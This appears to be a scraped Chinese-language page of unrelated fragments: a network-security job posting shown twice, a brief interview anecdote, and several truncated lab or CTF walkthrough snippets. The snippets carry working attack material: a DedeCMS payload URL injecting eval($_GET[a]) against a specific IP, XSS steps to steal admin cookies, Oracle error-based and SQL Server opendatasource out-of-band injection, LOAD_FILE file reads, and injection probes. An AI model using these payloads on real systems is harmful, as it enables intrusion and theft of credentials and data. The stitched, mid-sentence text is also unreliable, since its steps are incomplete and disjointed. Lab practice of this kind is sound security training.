1.负责网络信息安全服务项目实施，实施内容包括但不限于安全检测于加固、风险评估、渗透测试、全制度修编安、应急预案演练与应急响应、安全迎检与重保等；2.项目实施过程中的实施记录、报告、方案、制度等文档性材料的编制；3.项目实施过程中与相关方的沟通协调。任职资格：1.大专以上学历，计算机、通信、网络安全相关专业；2.一至三年信息安全行业经验，一年以上网路和信息安全服务项目实施经验。3.具备一定的文档、

1.负责网络信息安全服务项目实施，实施内容包括但不限于安全检测于加固、风险评估、渗透测试、全制度修编安、应急预案演练与应急响应、安全迎检与重保等；2.项目实施过程中的实施记录、报告、方案、制度等文档性材料的编制；3.项目实施过程中与相关方的沟通协调。任职资格：1.大专以上学历，计算机、通信、网络安全相关专业；2.一至三年信息安全行业经验，一年以上网路和信息安全服务项目实施经验。3.具备一定的文档、

其实我的面试经验和其他的几位大佬差距太大了  一个 小公司 起因吧就是因为在家带着 太无聊了，又一次和我同学闲扯淡说他们那缺人，来人就收（他是 负责 机房扫描的）第二天联系联系就去公司面试了 去面试的时候 经过一轮笔试和面试笔试就是贴别水了  25道选择题对了5道题  然后就是面试了 问我都会什么 sql 注入   xss  

打开传送门来到了靶场界面，是一个CMS网站，根据提示用admin登录后台：构造POC，http://120.203.13.75:8123/csrf/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\\%22;eval($_GET[a]);die();//接着我们可以构造URL，查看php

DOM型XSS也是通过反射型XSS来实现的还是首先找到可插点，直接看查看器，发现有document，我们可以使用</script>闭合掉前面的后面再写一个弹框 然后我们可以到dom.php?url处提交这个然后会在log.html处有然后我们最后如果要接收cookie只需要把xss写入后面的弹框即可这里好像需要把后面的用unicode进行编码，然能打到cookie。

一、打开靶场，发现是一个cms5.0的网站，百度查找cms5.0通杀的xss漏洞二、根据该篇文章，我们知道cms建立的网站，在找到错误对象和方法的时候，会将他记录在数据库，并在后台回显给管理员，故当错误信息为xss的payload的时候可以获取管理员cookie三、具体步骤：传入m=test时，因为没有该方法，所以报错404，并把错误信息回显给用户这时，我们把m的值替换成xss的payload：&

CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1))去查询关于主题的对应关键词，然后因为查询失败（应该是这个用户没有创建和查询的权限，默认情况没有创建，爆出未查询到的错误从而爆出查询的内容）rownum=1 输入一行数据select * from user_tables 查询出当前用户的表select*from

打开靶场，是SQL反弹注入，需要利用一个SQL数据库。根据老师建议的在香港云平台上搭建一个虚拟数据库服务器。用10分钟的匿名邮箱来注册账号，注册完成后，创建一个zhu数据库，在数据库里创建表。可以用select name frommaster.dbo.sysdatabases和dbo.sysobjects 来 查询系统库和表的内容。用insertinto opendatasource(）

OAD_FILE()   读取文件的函数读取文件并返回文件内容为字符串。要使用此函数，文件必须位于服务器主机上，必须指定完整路径的文件，而且必须有FILE权限。 该文件所有字节可读，但文件内容必须小于max_allowed_packet（限制server接受的数据包大小函数，默认1MB）。 如果该文件不存在或无法读取，因为前面的条件之一不满足，函数返回 NULL。http://

1.  http://120.203.13.75:6815/?id=1 and 1=1             http://120.203.13.75:6815/?id=1 and 1=2           找到注入点，此处可能是注入点2.&nb